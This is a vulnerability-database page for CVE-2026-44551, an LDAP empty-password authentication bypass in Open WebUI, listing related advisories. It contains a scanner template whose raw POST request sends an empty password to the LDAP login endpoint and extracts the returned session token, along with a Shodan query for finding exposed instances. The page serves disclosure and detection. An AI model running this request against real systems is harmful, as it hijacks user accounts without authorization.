| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2026-44551 | 15 May 202619:59 | – | attackerkb | |
| The vulnerability of the Connection.bind() function in the Open WebUI (formerly Ollama WebUI) web interface allows a hacker to bypass existing security mechanisms. | 19 May 202600:00 | – | bdu_fstec | |
| CVE-2026-44551 | 15 May 202621:55 | – | circl | |
| Open WebUI 授权问题漏洞 | 15 May 202600:00 | – | cnnvd | |
| CVE-2026-44551 | 15 May 202619:59 | – | cve | |
| CVE-2026-44551 Open WebUI: LDAP Empty Password Authentication Bypass | 15 May 202619:59 | – | cvelist | |
| EUVD-2026-30604 | 15 May 202619:59 | – | euvd | |
| Open WebUI has an LDAP Empty Password Authentication Bypass | 8 May 202619:38 | – | github | |
| CVE-2026-44551 | 15 May 202620:16 | – | nvd | |
| GHSA-2R4P-JPMG-48F4 Open WebUI has an LDAP Empty Password Authentication Bypass | 8 May 202619:38 | – | osv |
id: CVE-2026-44551
info:
name: Open WebUI 'LDAP Empty Password' - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0.
impact: |
Attackers can authenticate without a password and obtain full session tokens, leading to unauthorized access.
remediation: |
Update to version 0.9.0 or later.
reference:
- https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4
- https://nvd.nist.gov/vuln/detail/CVE-2026-44551
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-44551
epss-score: 0.01461
epss-percentile: 0.70418
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Open WebUI"
tags: cve,cve2026,open-webui,ldap,auth-bypass
variables:
username: "{{username}}"
http:
- raw:
- |
POST /api/v1/auths/ldap HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user":"{{username}}","password":""}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"token_type":'
- '{"id":'
- '"name":'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"token":"([^"]+)"'
# digest: 4a0a0047304502202ab1c95f4dfe6c2039184cb83d552964320a23288a4afa4ca8a57915e9ebd4b30221008b5f574b4bda30d93978122d125e587af0c39e026d4940d1bc402f59b8cea485:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation